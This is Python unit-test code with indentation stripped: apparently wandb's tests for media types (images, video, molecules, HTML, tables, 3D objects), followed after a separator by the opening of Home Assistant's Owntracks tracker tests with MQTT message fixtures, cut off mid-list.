for fig in utils.matplotlib_multiple_axes_figures():
wandb.Plotly(plt) # this should not error.
def test_plotly_from_matplotlib_with_image():
"""Ensures that wandb.Plotly constructor properly errors when
a pyplot with image is passed
"""
# try the figure version
fig = utils.matplotlib_with_image()
with pytest.raises(ValueError):
wandb.Plotly(fig)
plt.close()
# try the plt version
fig = utils.matplotlib_with_image()
with pytest.raises(ValueError):
wandb.Plotly(plt)
plt.close()
def test_image_from_matplotlib_with_image():
"""Ensures that wandb.Image constructor supports a pyplot with image is passed"""
# try the figure version
fig = utils.matplotlib_with_image()
wandb.Image(fig) # this should not error.
plt.close()
# try the plt version
fig = utils.matplotlib_with_image()
wandb.Image(plt) # this should not error.
plt.close()
@pytest.mark.skipif(
sys.version_info >= (3, 9), reason="plotly doesn't support py3.9 yet"
)
def test_make_plot_media_from_matplotlib_without_image():
"""Ensures that wand.Plotly.make_plot_media() returns a Plotly object when
there is no image
"""
fig = utils.matplotlib_without_image()
assert type(wandb.Plotly.make_plot_media(fig)) == wandb.Plotly
plt.close()
fig = utils.matplotlib_without_image()
assert type(wandb.Plotly.make_plot_media(plt)) == wandb.Plotly
plt.close()
def test_make_plot_media_from_matplotlib_with_image():
"""Ensures that wand.Plotly.make_plot_media() returns an Image object when
there is an image in the matplotlib figure
"""
fig = utils.matplotlib_with_image()
assert type(wandb.Plotly.make_plot_media(fig)) == wandb.Image
plt.close()
fig = utils.matplotlib_with_image()
assert type(wandb.Plotly.make_plot_media(plt)) == wandb.Image
plt.close()
def test_create_bokeh_plot(mocked_run):
"""Ensures that wandb.Bokeh constructor accepts a bokeh plot"""
bp = dummy_data.bokeh_plot()
bp = wandb.data_types.Bokeh(bp)
bp.bind_to_run(mocked_run, "bokeh", 0)
@pytest.mark.skipif(sys.version_info < (3, 6), reason="No moviepy.editor in py2")
def test_video_numpy_gif(mocked_run):
video = np.random.randint(255, size=(10, 3, 28, 28))
vid = wandb.Video(video, format="gif")
vid.bind_to_run(mocked_run, "videos", 0)
assert vid.to_json(mocked_run)["path"].endswith(".gif")
@pytest.mark.skipif(sys.version_info < (3, 6), reason="No moviepy.editor in py2")
def test_video_numpy_mp4(mocked_run):
video = np.random.randint(255, size=(10, 3, 28, 28))
vid = wandb.Video(video, format="mp4")
vid.bind_to_run(mocked_run, "videos", 0)
assert vid.to_json(mocked_run)["path"].endswith(".mp4")
@pytest.mark.skipif(sys.version_info < (3, 6), reason="No moviepy.editor in py2")
def test_video_numpy_multi(mocked_run):
video = np.random.random(size=(2, 10, 3, 28, 28))
vid = wandb.Video(video)
vid.bind_to_run(mocked_run, "videos", 0)
assert vid.to_json(mocked_run)["path"].endswith(".gif")
@pytest.mark.skipif(sys.version_info < (3, 6), reason="No moviepy.editor in py2")
def test_video_numpy_invalid():
video = np.random.random(size=(3, 28, 28))
with pytest.raises(ValueError):
wandb.Video(video)
def test_video_path(mocked_run):
with open("video.mp4", "w") as f:
f.write("00000")
vid = wandb.Video("video.mp4")
vid.bind_to_run(mocked_run, "videos", 0)
assert vid.to_json(mocked_run)["path"].endswith(".mp4")
def test_video_path_invalid(runner):
with runner.isolated_filesystem():
with open("video.avi", "w") as f:
f.write("00000")
with pytest.raises(ValueError):
wandb.Video("video.avi")
def test_molecule(mocked_run):
with open("test.pdb", "w") as f:
f.write("00000")
mol = wandb.Molecule("test.pdb")
mol.bind_to_run(mocked_run, "rad", "summary")
wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
assert os.path.exists(mol._path)
wandb.finish()
def test_molecule_file(mocked_run):
with open("test.pdb", "w") as f:
f.write("00000")
mol = wandb.Molecule(open("test.pdb", "r"))
mol.bind_to_run(mocked_run, "rad", "summary")
wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
assert os.path.exists(mol._path)
wandb.finish()
def test_molecule_from_smiles(mocked_run):
"""Ensures that wandb.Molecule.from_smiles supports valid SMILES molecule string representations"""
mol = wandb.Molecule.from_smiles("CC(=O)Nc1ccc(O)cc1")
mol.bind_to_run(mocked_run, "rad", "summary")
wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
assert os.path.exists(mol._path)
wandb.finish()
def test_molecule_from_invalid_smiles(mocked_run):
"""Ensures that wandb.Molecule.from_smiles errs if passed an invalid SMILES string"""
with pytest.raises(ValueError):
wandb.Molecule.from_smiles("TEST")
wandb.finish()
def test_molecule_from_rdkit_mol_object(mocked_run):
"""Ensures that wandb.Molecule.from_rdkit supports rdkit.Chem.rdchem.Mol objects"""
mol = wandb.Molecule.from_rdkit(rdkit.Chem.MolFromSmiles("CC(=O)Nc1ccc(O)cc1"))
mol.bind_to_run(mocked_run, "rad", "summary")
wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
assert os.path.exists(mol._path)
wandb.finish()
def test_molecule_from_rdkit_mol_file(mocked_run):
"""Ensures that wandb.Molecule.from_rdkit supports .mol files"""
substance = rdkit.Chem.MolFromSmiles("CC(=O)Nc1ccc(O)cc1")
mol_file_name = "test.mol"
rdkit.Chem.rdmolfiles.MolToMolFile(substance, mol_file_name)
mol = wandb.Molecule.from_rdkit(mol_file_name)
mol.bind_to_run(mocked_run, "rad", "summary")
wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
assert os.path.exists(mol._path)
wandb.finish()
def test_molecule_from_rdkit_invalid_input(mocked_run):
"""Ensures that wandb.Molecule.from_rdkit errs on invalid input"""
mol_file_name = "test"
with pytest.raises(ValueError):
wandb.Molecule.from_rdkit(mol_file_name)
wandb.finish()
def test_html_str(mocked_run):
html = wandb.Html("<html><body><h1>Hello</h1></body></html>")
html.bind_to_run(mocked_run, "rad", "summary")
wandb.Html.seq_to_json([html], mocked_run, "rad", "summary")
assert os.path.exists(html._path)
wandb.finish()
def test_html_styles():
with CliRunner().isolated_filesystem():
pre = (
'<base target="_blank"><link rel="stylesheet" type="text/css" '
'href="https://app.wandb.ai/normalize.css" />'
)
html = wandb.Html("<html><body><h1>Hello</h1></body></html>")
assert (
html.html
== "<html><head>" + pre + "</head><body><h1>Hello</h1></body></html>"
)
html = wandb.Html("<html><head></head><body><h1>Hello</h1></body></html>")
assert (
html.html
== "<html><head>" + pre + "</head><body><h1>Hello</h1></body></html>"
)
html = wandb.Html("<h1>Hello</h1>")
assert html.html == pre + "<h1>Hello</h1>"
html = wandb.Html("<h1>Hello</h1>", inject=False)
assert html.html == "<h1>Hello</h1>"
def test_html_file(mocked_run):
with open("test.html", "w") as f:
f.write("<html><body><h1>Hello</h1></body></html>")
html = wandb.Html(open("test.html"))
html.bind_to_run(mocked_run, "rad", "summary")
wandb.Html.seq_to_json([html, html], mocked_run, "rad", "summary")
assert os.path.exists(html._path)
def test_html_file_path(mocked_run):
with open("test.html", "w") as f:
f.write("<html><body><h1>Hello</h1></body></html>")
html = wandb.Html("test.html")
html.bind_to_run(mocked_run, "rad", "summary")
wandb.Html.seq_to_json([html, html], mocked_run, "rad", "summary")
assert os.path.exists(html._path)
def test_table_default():
table = wandb.Table()
table.add_data("Some awesome text", "Positive", "Negative")
assert table._to_table_json() == {
"data": [["Some awesome text", "Positive", "Negative"]],
"columns": ["Input", "Output", "Expected"],
}
def test_table_eq_debug():
# Invalid Type
a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
b = {}
with pytest.raises(AssertionError):
a._eq_debug(b, True)
assert a != b
# Mismatch Rows
a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
b = wandb.Table(data=[[1, 2, 3]])
with pytest.raises(AssertionError):
a._eq_debug(b, True)
assert a != b
# Mismatch Columns
a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
b = wandb.Table(data=[[1, 2, 3], [4, 5, 6]], columns=["a", "b", "c"])
with pytest.raises(AssertionError):
a._eq_debug(b, True)
assert a != b
# Mismatch Types
a = wandb.Table(data=[[1, 2, 3]])
b = wandb.Table(data=[["1", "2", "3"]])
with pytest.raises(AssertionError):
a._eq_debug(b, True)
assert a != b
# Mismatch Data
a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
b = wandb.Table(data=[[1, 2, 3], [4, 5, 100]])
with pytest.raises(AssertionError):
a._eq_debug(b, True)
assert a != b
a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
b = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
a._eq_debug(b, True)
assert a == b
@pytest.mark.skipif(sys.version_info >= (3, 10), reason="no pandas py3.10 wheel")
def test_table_custom():
import pandas as pd
table = wandb.Table(["Foo", "Bar"])
table.add_data("So", "Cool")
table.add_row("&", "Rad")
assert table._to_table_json() == {
"data": [["So", "Cool"], ["&", "Rad"]],
"columns": ["Foo", "Bar"],
}
df = pd.DataFrame(columns=["Foo", "Bar"], data=[["So", "Cool"], ["&", "Rad"]])
table_df = wandb.Table(dataframe=df)
assert table._to_table_json() == table_df._to_table_json()
point_cloud_1 = np.array([[0, 0, 0, 1], [0, 0, 1, 13], [0, 1, 0, 2], [0, 1, 0, 4]])
point_cloud_2 = np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 0]])
point_cloud_3 = np.array(
[
[0, 0, 0, 100, 100, 100],
[0, 0, 1, 100, 100, 100],
[0, 1, 0, 100, 100, 100],
[0, 1, 0, 100, 100, 100],
]
)
def test_object3d_numpy(mocked_run):
obj1 = wandb.Object3D(point_cloud_1)
obj2 = wandb.Object3D(point_cloud_2)
obj3 = wandb.Object3D(point_cloud_3)
obj1.bind_to_run(mocked_run, "object3d", 0)
obj2.bind_to_run(mocked_run, "object3d", 1)
obj3.bind_to_run(mocked_run, "object3d", 2)
assert obj1.to_json(mocked_run)["_type"] == "object3D-file"
assert obj2.to_json(mocked_run)["_type"] == "object3D-file"
assert obj3.to_json(mocked_run)["_type"] == "object3D-file"
def test_object3d_dict(mocked_run):
obj = wandb.Object3D({"type": "lidar/beta",})
obj.bind_to_run(mocked_run, "object3D", 0)
assert obj.to_json(mocked_run)["_type"] == "object3D-file"
wandb.finish()
def test_object3d_dict_invalid(mocked_run):
with pytest.raises(ValueError):
obj = wandb.Object3D({"type": "INVALID",})
wandb.finish()
def test_object3d_dict_invalid_string(mocked_run):
with pytest.raises(ValueError):
obj = wandb.Object3D("INVALID")
wandb.finish()
def test_object3d_obj(mocked_run):
obj = wandb.Object3D(utils.fixture_open("cube.obj"))
obj.bind_to_run(mocked_run, "object3D", 0)
assert obj.to_json(mocked_run)["_type"] == "object3D-file"
wandb.finish()
def test_object3d_gltf(mocked_run):
obj = wandb.Object3D(utils.fixture_open("Box.gltf"))
obj.bind_to_run(mocked_run, "object3D", 0)
assert obj.to_json(mocked_run)["_type"] == "object3D-file"
wandb.finish()
def test_object3d_io(mocked_run):
f = utils.fixture_open("Box.gltf")
body = f.read()
ioObj = six.StringIO(six.u(body))
obj = wandb.Object3D(ioObj, file_type="obj")
obj.bind_to_run(mocked_run, "object3D", 0)
assert obj.to_json(mocked_run)["_type"] == "object3D-file"
wandb.finish()
def test_object3d_unsupported_numpy():
with pytest.raises(ValueError):
wandb.Object3D(np.array([1]))
with pytest.raises(ValueError):
wandb.Object3D(np.array([[1, 2], [3, 4], [1, 2]]))
with pytest.raises(ValueError):
wandb.Object3D(np.array([1, 3, 4, 5, 6, 7, 8, 8, 3]))
with pytest.raises(ValueError):
wandb.Object3D(np.array([[1, 3, 4, 5, 6, 7, 8, 8, 3]]))
f = utils.fixture_open("Box.gltf")
body = f.read()
ioObj = six.StringIO(six.u(body))
with pytest.raises(ValueError):
wandb.Object3D(ioObj)
def test_object3d_seq_to_json(mocked_run):
objs = [
wandb.Object3D(utils.fixture_open("Box.gltf")),
wandb.Object3D(utils.fixture_open("cube.obj")),
wandb.Object3D(point_cloud_1),
]
for o in objs:
o.bind_to_run(mocked_run, "pc", 1)
obj = wandb.Object3D.seq_to_json(objs, mocked_run, "pc", 1)
box = obj["filenames"][0]
cube = obj["filenames"][1]
pts = obj["filenames"][2]
assert os.path.exists(os.path.join(mocked_run.dir, "media", "object3D", box))
assert os.path.exists(os.path.join(mocked_run.dir, "media", "object3D", cube))
assert os.path.exists(os.path.join(mocked_run.dir, "media", "object3D", pts))
assert obj["_type"] == "object3D"
assert obj["filenames"] == [
box,
cube,
pts,
]
wandb.finish()
def test_table_init():
table = wandb.Table(data=[["Some awesome text", "Positive", "Negative"]])
assert table._to_table_json() == {
"data": [["Some awesome text", "Positive", "Negative"]],
"columns": ["Input", "Output", "Expected"],
}
table_data = [
["a", 1, True],
["b", 2, False],
["c", 3, True],
]
def test_table_from_list():
table = wandb.Table(data=table_data)
assert table.data == table_data
with pytest.raises(AssertionError):
# raises when user accidentally overrides columns
table = wandb.Table(table_data)
with pytest.raises(AssertionError):
# raises when user uses list in "dataframe"
table = wandb.Table(dataframe=table_data)
# legacy
table = wandb.Table(rows=table_data)
assert table.data == table_data
def test_table_iterator():
table = wandb.Table(data=table_data)
for ndx, row in table.iterrows():
assert row == table_data[ndx]
table = wandb.Table(data=[])
assert len([(ndx, row) for ndx, row in table.iterrows()]) == 0
def test_table_from_numpy():
np_data = np.array(table_data)
table = wandb.Table(data=np_data)
assert table.data == np_data.tolist()
with pytest.raises(AssertionError):
# raises when user accidentally overrides columns
table = wandb.Table(np_data)
with pytest.raises(AssertionError):
# raises when user uses list in "dataframe"
table = wandb.Table(dataframe=np_data)
@pytest.mark.skipif(sys.version_info >= (3, 10), reason="no pandas py3.10 wheel")
def test_table_from_pandas():
import pandas as pd
pd_data = pd.DataFrame(table_data)
table = wandb.Table(data=pd_data)
assert table.data == table_data
with pytest.raises(AssertionError):
# raises when user accidentally overrides columns
table = wandb.Table(pd_data)
# legacy
table = wandb.Table(dataframe=pd_data)
assert table.data == table_data
def test_graph():
graph = wandb.Graph()
node_a = data_types.Node("a", "Node A", size=(4,))
node_b = data_types.Node("b", "Node B", size=(16,))
graph.add_node(node_a)
graph.add_node(node_b)
graph.add_edge(node_a, node_b)
assert graph._to_graph_json() == {
"edges": [["a", "b"]],
"format": "keras",
"nodes": [
{"id": "a", "name": "Node A", "size": (4,)},
{"id": "b", "name": "Node B", "size": (16,)},
],
}
def test_numpy_arrays_to_list():
conv = _numpy_arrays_to_lists
assert conv(np.array(1)) == [1]
assert conv(np.array((1, 2,))) == [1, 2]
assert conv([np.array((1, 2,))]) == [[1, 2]]
assert conv(np.array(({"a": [np.array((1, 2,))]}, 3,))) == [{"a": [[1, 2]]}, 3]
def test_partitioned_table_from_json(runner, mock_server, api):
# This is mocked to return some data
art = api.artifact("entity/project/dummy:v0", type="dataset")
ptable = art.get("dataset")
data = [[0, 0, 1]]
for ndx, row in ptable.iterrows():
assert row == data[ndx]
def test_partitioned_table():
partition_table = wandb.data_types.PartitionedTable(parts_path="parts")
assert len([(ndx, row) for ndx, row in partition_table.iterrows()]) == 0
assert partition_table == wandb.data_types.PartitionedTable(parts_path="parts")
assert partition_table != wandb.data_types.PartitionedTable(parts_path="parts2")
def test_table_column_style():
# Test Base Cases
table1 = wandb.Table(columns=[], data=[])
table1.add_column("number", [1, 2, 3])
table1.add_data(4)
with pytest.raises(AssertionError):
table1.add_column("strings", ["a"])
table1.add_column("strings", ["a", "b", "c", "d"])
table1.set_pk("strings")
table1.add_data(5, "e")
table1.add_column("np_numbers", np.array([101, 102, 103, 104, 105]))
assert table1.data == [
[1, "a", 101],
[2, "b", 102],
[3, "c", 103],
[4, "d", 104],
[5, "e", 105],
]
assert table1.get_column("number") == [1, 2, 3, 4, 5]
assert table1.get_column("strings") == ["a", "b", "c", "d", "e"]
assert table1.get_column("np_numbers") == [101, 102, 103, 104, 105]
assert np.all(
table1.get_column("number", convert_to="numpy") == np.array([1, 2, 3, 4, 5])
)
assert np.all(
table1.get_column("strings", convert_to="numpy")
== np.array(["a", "b", "c", "d", "e"])
)
assert np.all(
table1.get_column("np_numbers", convert_to="numpy")
== np.array([101, 102, 103, 104, 105])
)
ndxs = table1.get_index()
assert ndxs == [0, 1, 2, 3, 4]
assert [ndx._table == table1 for ndx in ndxs]
# Test More Images and ndarrays
rand_1 = np.random.randint(255, size=(32, 32))
rand_2 = np.random.randint(255, size=(32, 32))
rand_3 = np.random.randint(255, size=(32, 32))
img_1 = wandb.Image(rand_1)
img_2 = wandb.Image(rand_2)
img_3 = wandb.Image(rand_3)
table2 = wandb.Table(columns=[], data=[])
table2.add_column("np_data", [rand_1, rand_2])
table2.add_column("image", [img_1, img_2])
table2.add_data(rand_3, img_3)
assert table2.data == [[rand_1, img_1], [rand_2, img_2], [rand_3, img_3]]
assert np.all(
table2.get_column("np_data", convert_to="numpy")
== np.array([rand_1, rand_2, rand_3])
)
assert table2.get_column("image") == [img_1, img_2, img_3]
a = table2.get_column("image", convert_to="numpy")
b = np.array([rand_1, rand_2, rand_3])
assert np.all(
table2.get_column("image", convert_to="numpy")
== np.array([rand_1, rand_2, rand_3])
)
table3 = wandb.Table(columns=[], data=[])
table3.add_column("table1_fk", table1.get_column("strings"))
assert table3.get_column("table1_fk")[0]._table == table1
def test_ndarrays_in_tables():
rows = 10
d = 128
c = 3
nda_table = wandb.Table(
columns=["ndarray"], data=np.random.randint(255, size=(rows, 1, d, d, c))
)
nda_table.add_data(np.random.randint(255, size=(d, d, c)))
nda_table.add_data(np.random.randint(255, size=(d, d, c)).tolist())
with pytest.raises(TypeError):
nda_table.add_data(np.random.randint(255, size=(d + 1, d, c)))
with pytest.raises(TypeError):
nda_table.add_data(np.random.randint(255, size=(d + 1, d, c)).tolist())
assert any(
[
isinstance(t, wandb.data_types._dtypes.NDArrayType)
for t in nda_table._column_types.params["type_map"]["ndarray"].params[
"allowed_types"
]
]
)
nda_table = wandb.Table(columns=[], data=[])
nda_table.add_column(
"odd_col",
[[[i], [i]] for i in range(rows)] + [np.random.randint(255, size=(2, 1))],
)
assert isinstance(
nda_table._column_types.params["type_map"]["odd_col"],
wandb.data_types._dtypes.ListType,
)
nda_table.cast("odd_col", wandb.data_types._dtypes.NDArrayType(shape=(2, 1)))
nda_table.add_data(np.random.randint(255, size=(2, 1)))
nda_table.add_data(np.random.randint(255, size=(2, 1)).tolist())
with pytest.raises(TypeError):
nda_table.add_data(np.random.randint(255, size=(2, 2)))
with pytest.raises(TypeError):
nda_table.add_data(np.random.randint(255, size=(2, 2)).tolist())
assert isinstance(
nda_table._column_types.params["type_map"]["odd_col"],
wandb.data_types._dtypes.NDArrayType,
)
def test_table_logging(mocked_run, live_mock_server, test_settings, api):
run = wandb.init(settings=test_settings)
run.log(
{
"logged_table": wandb.Table(
columns=["a"], data=[[wandb.Image(np.ones(shape=(32, 32)))]],
)
}
)
run.finish()
assert True
def test_reference_table_logging(mocked_run, live_mock_server, test_settings, api):
live_mock_server.set_ctx({"max_cli_version": "0.10.33"})
run = wandb.init(settings=test_settings)
t = wandb.Table(columns=["a"], data=[[wandb.Image(np.ones(shape=(32, 32)))]],)
run.log({"logged_table": t})
run.log({"logged_table": t})
run.finish()
assert True
live_mock_server.set_ctx({"max_cli_version": "0.11.0"})
run = wandb.init(settings=test_settings)
t = wandb.Table(columns=["a"], data=[[wandb.Image(np.ones(shape=(32, 32)))]],)
run.log({"logged_table": t})
run.log({"logged_table": t})
run.finish()
assert True
def test_reference_table_artifacts(mocked_run, live_mock_server, test_settings, api):
live_mock_server.set_ctx({"max_cli_version": "0.11.0"})
run = wandb.init(settings=test_settings)
t = wandb.Table(columns=["a"], data=[[wandb.Image(np.ones(shape=(32, 32)))]],)
art = wandb.Artifact("A", "dataset")
art.add(t, "table")
run.log_artifact(art)
art = wandb.Artifact("A", "dataset")
art.add(t, "table")
run.log_artifact(art)
run.finish()
assert True
# TODO: In another location: need to manually test the internal/backend
# artifact sender with an artifact that has a reference to be resolved - i
# think this will get the most coverage
def test_table_reference(runner, live_mock_server, test_settings):
with runner.isolated_filesystem():
run = wandb.init(settings=test_settings)
artifact = run.use_artifact("dummy:v0")
table = artifact.get("parts/1")
run.log({"table": table})
run.finish()
assert True
def test_partitioned_table_logging(mocked_run, live_mock_server, test_settings, api):
run = wandb.init(settings=test_settings)
run.log({"logged_table": wandb.data_types.PartitionedTable("parts")})
run.finish()
assert True
def test_joined_table_logging(mocked_run, live_mock_server, test_settings, api):
run = wandb.init(settings=test_settings)
art = wandb.Artifact("A", "dataset")
t1 = wandb.Table(
columns=["id", "a"], data=[[1, wandb.Image(np.ones(shape=(32, 32)))]],
)
t2 = wandb.Table(
columns=["id", "a"], data=[[1, wandb.Image(np.ones(shape=(32, 32)))]],
)
art.add(t1, "t1")
art.add(t2, "t2")
jt = wandb.JoinedTable(t1, t2, "id")
art.add(jt, "jt")
run.log_artifact(art)
run.log({"logged_table": jt})
run.finish()
assert True
def test_fail_to_make_file(mocked_run):
wb_image = wandb.Image(image)
try:
wb_image.bind_to_run(mocked_run, "my key: an identifier", 0)
if platform.system() == "Windows":
assert False
except ValueError as e:
assert " is invalid. Please remove invalid filename characters" in str(e)
def test_log_with_dir_sep_windows(live_mock_server, test_settings):
run = wandb.init(settings=test_settings)
wb_image = wandb.Image(image)
run.log({"train/image": wb_image})
run.finish()
assert True
def test_log_with_back_slash_windows(live_mock_server, test_settings):
run = wandb.init(settings=test_settings)
wb_image = wandb.Image(image)
# windows doesnt allow a backslash in media keys right now
if platform.system() == "Windows":
with pytest.raises(ValueError):
run.log({"train\image": wb_image})
else:
run.log({"train\image": wb_image})
run.finish()
assert True
runbindable_media = [
wandb.Image(image, masks={"overlay": standard_mask}),
wandb.data_types.ImageMask(
{"mask_data": np.random.randint(0, 10, (300, 300))}, key="test"
),
wandb.Table(data=[[1, 2, 3], [4, 5, 6]]),
wandb.Graph(),
wandb.Audio(np.random.uniform(-1, 1, 44100), sample_rate=44100),
]
@pytest.mark.parametrize("media", runbindable_media)
def test_media_keys_escaped_as_glob_for_publish(mocked_run, media):
weird_key = "[weirdkey]"
media.bind_to_run(mocked_run, weird_key, 0)
published_globs = [
g
for (
[files_dict],
[],
) in mocked_run._backend.interface.publish_files.call_args_list
for g, _ in files_dict["files"]
]
assert not any(weird_key in g for g in published_globs), published_globs
assert any(glob.escape(weird_key) in g for g in published_globs), published_globs
def test_image_array_old_wandb(
live_mock_server, test_settings, monkeypatch, capsys, parse_ctx
):
monkeypatch.setattr(wandb.util, "_get_max_cli_version", lambda: "0.10.33")
run = wandb.init(settings=test_settings)
im_count = 5
wb_image = [wandb.Image(image) for i in range(im_count)]
run.log({"logged_images": wb_image})
run.finish()
ctx_util = parse_ctx(live_mock_server.get_ctx())
outerr = capsys.readouterr()
assert "Unable to log image array filenames. In some cases, this can prevent images from being"
"viewed in the UI. Please upgrade your wandb server." in outerr.err
summary = ctx_util.summary
assert "filenames" not in list(summary["logged_images"].keys())
| |
"""The tests for the Owntracks device tracker."""
import json
import pytest
from homeassistant.components import owntracks
from homeassistant.const import STATE_NOT_HOME
from homeassistant.setup import async_setup_component
from tests.async_mock import patch
from tests.common import MockConfigEntry, async_fire_mqtt_message, mock_coro
USER = "greg"
DEVICE = "phone"
LOCATION_TOPIC = f"owntracks/{USER}/{DEVICE}"
EVENT_TOPIC = f"owntracks/{USER}/{DEVICE}/event"
WAYPOINTS_TOPIC = f"owntracks/{USER}/{DEVICE}/waypoints"
WAYPOINT_TOPIC = f"owntracks/{USER}/{DEVICE}/waypoint"
USER_BLACKLIST = "ram"
WAYPOINTS_TOPIC_BLOCKED = f"owntracks/{USER_BLACKLIST}/{DEVICE}/waypoints"
LWT_TOPIC = f"owntracks/{USER}/{DEVICE}/lwt"
BAD_TOPIC = f"owntracks/{USER}/{DEVICE}/unsupported"
DEVICE_TRACKER_STATE = f"device_tracker.{USER}_{DEVICE}"
IBEACON_DEVICE = "keys"
MOBILE_BEACON_FMT = "device_tracker.beacon_{}"
CONF_MAX_GPS_ACCURACY = "max_gps_accuracy"
CONF_WAYPOINT_IMPORT = owntracks.CONF_WAYPOINT_IMPORT
CONF_WAYPOINT_WHITELIST = owntracks.CONF_WAYPOINT_WHITELIST
CONF_SECRET = owntracks.CONF_SECRET
CONF_MQTT_TOPIC = owntracks.CONF_MQTT_TOPIC
CONF_EVENTS_ONLY = owntracks.CONF_EVENTS_ONLY
CONF_REGION_MAPPING = owntracks.CONF_REGION_MAPPING
TEST_ZONE_LAT = 45.0
TEST_ZONE_LON = 90.0
TEST_ZONE_DEG_PER_M = 0.0000127
FIVE_M = TEST_ZONE_DEG_PER_M * 5.0
# Home Assistant Zones
INNER_ZONE = {
"name": "zone",
"latitude": TEST_ZONE_LAT + 0.1,
"longitude": TEST_ZONE_LON + 0.1,
"radius": 50,
}
OUTER_ZONE = {
"name": "zone",
"latitude": TEST_ZONE_LAT,
"longitude": TEST_ZONE_LON,
"radius": 100000,
}
def build_message(test_params, default_params):
"""Build a test message from overrides and another message."""
new_params = default_params.copy()
new_params.update(test_params)
return new_params
# Default message parameters
DEFAULT_LOCATION_MESSAGE = {
"_type": "location",
"lon": OUTER_ZONE["longitude"],
"lat": OUTER_ZONE["latitude"],
"acc": 60,
"tid": "user",
"t": "u",
"batt": 92,
"cog": 248,
"alt": 27,
"p": 101.3977584838867,
"vac": 4,
"tst": 1,
"vel": 0,
}
# Owntracks will publish a transition when crossing
# a circular region boundary.
ZONE_EDGE = TEST_ZONE_DEG_PER_M * INNER_ZONE["radius"]
DEFAULT_TRANSITION_MESSAGE = {
"_type": "transition",
"t": "c",
"lon": INNER_ZONE["longitude"],
"lat": INNER_ZONE["latitude"] - ZONE_EDGE,
"acc": 60,
"event": "enter",
"tid": "user",
"desc": "inner",
"wtst": 1,
"tst": 2,
}
# iBeacons that are named the same as an HA zone
# are used to trigger enter and leave updates
# for that zone. In this case the "inner" zone.
#
# iBeacons that do not share an HA zone name
# are treated as mobile tracking devices for
# objects which can't track themselves e.g. keys.
#
# iBeacons are typically configured with the
# default lat/lon 0.0/0.0 and have acc 0.0 but
# regardless the reported location is not trusted.
#
# Owntracks will send both a location message
# for the device and an 'event' message for
# the beacon transition.
DEFAULT_BEACON_TRANSITION_MESSAGE = {
"_type": "transition",
"t": "b",
"lon": 0.0,
"lat": 0.0,
"acc": 0.0,
"event": "enter",
"tid": "user",
"desc": "inner",
"wtst": 1,
"tst": 2,
}
# Location messages
LOCATION_MESSAGE = DEFAULT_LOCATION_MESSAGE
LOCATION_MESSAGE_INACCURATE = build_message(
{
"lat": INNER_ZONE["latitude"] - ZONE_EDGE,
"lon": INNER_ZONE["longitude"] - ZONE_EDGE,
"acc": 2000,
},
LOCATION_MESSAGE,
)
LOCATION_MESSAGE_ZERO_ACCURACY = build_message(
{
"lat": INNER_ZONE["latitude"] - ZONE_EDGE,
"lon": INNER_ZONE["longitude"] - ZONE_EDGE,
"acc": 0,
},
LOCATION_MESSAGE,
)
LOCATION_MESSAGE_NOT_HOME = build_message(
{
"lat": OUTER_ZONE["latitude"] - 2.0,
"lon": INNER_ZONE["longitude"] - 2.0,
"acc": 100,
},
LOCATION_MESSAGE,
)
# Region GPS messages
REGION_GPS_ENTER_MESSAGE = DEFAULT_TRANSITION_MESSAGE
REGION_GPS_LEAVE_MESSAGE = build_message(
{
"lon": INNER_ZONE["longitude"] - ZONE_EDGE * 10,
"lat": INNER_ZONE["latitude"] - ZONE_EDGE * 10,
"event": "leave",
},
DEFAULT_TRANSITION_MESSAGE,
)
REGION_GPS_ENTER_MESSAGE_INACCURATE = build_message(
{"acc": 2000}, REGION_GPS_ENTER_MESSAGE
)
REGION_GPS_LEAVE_MESSAGE_INACCURATE = build_message(
{"acc": 2000}, REGION_GPS_LEAVE_MESSAGE
)
REGION_GPS_ENTER_MESSAGE_ZERO = build_message({"acc": 0}, REGION_GPS_ENTER_MESSAGE)
REGION_GPS_LEAVE_MESSAGE_ZERO = build_message({"acc": 0}, REGION_GPS_LEAVE_MESSAGE)
REGION_GPS_LEAVE_MESSAGE_OUTER = build_message(
{
"lon": OUTER_ZONE["longitude"] - 2.0,
"lat": OUTER_ZONE["latitude"] - 2.0,
"desc": "outer",
"event": "leave",
},
DEFAULT_TRANSITION_MESSAGE,
)
REGION_GPS_ENTER_MESSAGE_OUTER = build_message(
{
"lon": OUTER_ZONE["longitude"],
"lat": OUTER_ZONE["latitude"],
"desc": "outer",
"event": "enter",
},
DEFAULT_TRANSITION_MESSAGE,
)
# Region Beacon messages
REGION_BEACON_ENTER_MESSAGE = DEFAULT_BEACON_TRANSITION_MESSAGE
REGION_BEACON_LEAVE_MESSAGE = build_message(
{"event": "leave"}, DEFAULT_BEACON_TRANSITION_MESSAGE
)
# Mobile Beacon messages
MOBILE_BEACON_ENTER_EVENT_MESSAGE = build_message(
{"desc": IBEACON_DEVICE}, DEFAULT_BEACON_TRANSITION_MESSAGE
)
MOBILE_BEACON_LEAVE_EVENT_MESSAGE = build_message(
{"desc": IBEACON_DEVICE, "event": "leave"}, DEFAULT_BEACON_TRANSITION_MESSAGE
)
# Waypoint messages
WAYPOINTS_EXPORTED_MESSAGE = {
"_type": "waypoints",
"_creator": "test",
"waypoints": [
{
"_type": "waypoint",
"tst": 3,
"lat": 47,
"lon": 9,
"rad": 10,
"desc": "exp_wayp1",
},
{
"_type": "waypoint",
"tst": 4,
"lat": 3,
"lon": 9,
"rad": 500,
"desc": "exp_wayp2",
},
],
}
WAYPOINTS_UPDATED_MESSAGE = {
"_type": "waypoints",
"_creator": "test",
"waypoints": [
{
"_type": "waypoint",
"tst": 4,
"lat": 9,
"lon": 47,
"rad": 50,
"desc": "exp_wayp1",
}
],
}
WAYPOINT_MESSAGE = {
"_type": "waypoint",
"tst": 4,
"lat": 9,
"lon": 47,
"rad": 50,
"desc": "exp_wayp1",
}
WAYPOINT_ENTITY_NAMES = [
"zone.greg_phone_exp_wayp1",
"zone.greg_phone_exp_wayp2",
